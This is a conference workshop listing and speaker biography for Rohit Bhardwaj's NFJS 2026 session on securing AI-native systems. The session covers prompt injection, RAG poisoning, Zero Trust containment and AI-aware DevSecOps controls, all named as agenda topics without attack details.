Speaker Topics - No Fluff Just Stuff
NFJS2026

Securing AI-Native Systems in the Mythos Era

What happens when AI accelerates exploit discovery, attack chaining, lateral movement, and abuse of connected systems faster than our patch cycle?

AI has changed the economics of cyber offense. With Anthropic’s Mythos Preview demonstrating the ability to discover, chain, and exploit sophisticated vulnerabilities at machine speed, enterprises can no longer rely only on authentication, MFA, patching, and traditional DevSecOps controls.

This workshop teaches architects, platform engineers, security leaders, and DevSecOps teams how to secure AI-native applications and enterprise systems in the Mythos era. Participants will learn how LLM-specific risks, such as prompt injection, RAG poisoning, data leakage, excessive agency, and tool misuse, combine with traditional risks, such as vulnerable dependencies, misconfigurations, weak segmentation, stale credentials, and excessive lateral movement paths.
The workshop introduces a containment-first security model: secure the AI app, secure the pipeline, and limit the blast radius when prevention fails. Through practical scenarios, participants will threat-model AI-native systems, map OWASP LLM risks to controls, design Zero Trust boundaries, secure RAG and agent workflows, add AI-aware checks into CI/CD, and build an executive-ready scorecard for Mythos-era resilience.

Bottom line: in the AI-speed attack era, the goal is not only to stop every breach. The goal is to make sure one compromised prompt, tool, workload, API, identity, or dependency cannot become an enterprise-wide incident.

What You’ll Learn

  • How Anthropic Mythos changes the security conversation from prevention-only to containment-first.
  • Why authentication, MFA, scanning, and patching are necessary but not enough in AI-speed attack scenarios.
  • How to threat-model AI-native systems across prompts, RAG, tools, agents, APIs, workloads, identities, and data.
  • How to apply the OWASP LLM/GenAI Top 10 to real enterprise architectures.
  • How to defend against prompt injection, indirect prompt injection, RAG poisoning, excessive agency, data leakage, and unsafe tool calls.
  • How to design Zero Trust protect surfaces that limit blast radius when one identity, workload, tool, or knowledge source is compromised.
  • How to embed AI-aware security checks into DevSecOps pipelines.
  • How to build a Mythos-ready executive scorecard for security, compliance, and resilience.

Who Should Attend

  • Software architects designing AI-native and LLM-powered systems.
  • Platform engineers building secure AI platforms, RAG pipelines, and agentic workflows.
  • DevSecOps leads responsible for CI/CD security, runtime controls, and release governance.
  • Security engineers assessing AI-specific attack surfaces.
  • Enterprise architects responsible for Zero Trust, cloud security, and blast-radius reduction.
  • CTOs, CISOs, product owners, and engineering leaders accountable for AI safety, trust, compliance, and business continuity.

Takeaways

  • AI Attack Surface Map
  • OWASP LLM Risk-to-Control Matrix
  • RAG Poisoning Defense Checklist
  • Agent Tool Permission Matrix
  • Protect Surface Inventory
  • Blast-Radius Containment Map
  • Zero Trust Policy Checklist
  • AI DevSecOps Pipeline Gates
  • Mythos-Ready Security Scorecard
  • AI-Speed Incident Response Playbook

Agenda

Module 1 — Mythos and the New AI-Speed Attack Window

  • Why Mythos changes enterprise security assumptions.
  • Why MFA, authentication, and patching are not enough.
  • Prevention vs containment.
  • How AI accelerates vulnerability discovery, exploit chaining, and attacker movement.

Module 2 — The AI-Native Attack Surface

  • Anatomy of an LLM-powered application.
  • Prompts, RAG, vector databases, tools, agents, APIs, memory, and workflows.
  • New trust boundaries in AI-native systems.
  • Where attackers can influence, exfiltrate, or trigger business actions.

Module 3 — OWASP LLM/GenAI Top 10 Applied

  • Prompt injection and jailbreaks.
  • Sensitive data leakage.
  • RAG and vector database poisoning.
  • Excessive agency and unsafe tool use.
  • Mapping each risk to prevention, detection, containment, and recovery controls.

Module 4 — RAG, Tools, and Agent Security

  • Securing knowledge ingestion and retrieval.
  • Detecting indirect prompt injection in documents.
  • Designing trusted evidence pipelines.
  • Governing tool calls, API actions, approvals, and audit trails.

Module 5 — Zero Trust and Blast-Radius Containment

  • Protect-surface thinking for AI systems.
  • Workload isolation, microsegmentation, secrets isolation, and egress control.
  • Limiting lateral movement after compromise.
  • Designing containment boundaries for identities, tools, data, models, and production systems.

Module 6 — AI DevSecOps and Executive Readiness

  • AI-aware CI/CD security gates.
  • Prompt, RAG, tool, dependency, and configuration checks.
  • Runtime monitoring and AI incident response.
  • Mythos-ready security scorecard for executives and regulators.

Rohit Bhardwaj

About Rohit Bhardwaj

Rohit Bhardwaj is a Director of Architecture working at Salesforce. Rohit has extensive experience architecting multi-tenant cloud-native solutions in Resilient Microservices Service-Oriented architectures using AWS Stack. In addition, Rohit has a proven ability in designing solutions and executing and delivering transformational programs that reduce costs and increase efficiencies.

As a trusted advisor, leader, and collaborator, Rohit applies problem resolution, analytical, and operational skills to all initiatives and develops strategic requirements and solution analysis through all stages of the project life cycle and product readiness to execution.
Rohit excels in designing scalable cloud microservice architectures using Spring Boot and Netflix OSS technologies using AWS and Google clouds. As a Security Ninja, Rohit looks for ways to resolve application security vulnerabilities using ethical hacking and threat modeling. Rohit is excited about architecting cloud technologies using Dockers, REDIS, NGINX, RightScale, RabbitMQ, Apigee, Azul Zing, Actuate BIRT reporting, Chef, Splunk, Rest-Assured, SoapUI, Dynatrace, and EnterpriseDB. In addition, Rohit has developed lambda architecture solutions using Apache Spark, Cassandra, and Camel for real-time analytics and integration projects.

Rohit has done MBA from Babson College in Corporate Entrepreneurship, Masters in Computer Science from Boston University and Harvard University. Rohit is a regular speaker at No Fluff Just Stuff, UberConf, RichWeb, GIDS, and other international conferences.

Rohit loves to connect on http://www.productivecloudinnovation.com.
http://linkedin.com/in/rohit-bhardwaj-cloud or using Twitter at rbhardwaj1.

More About Rohit »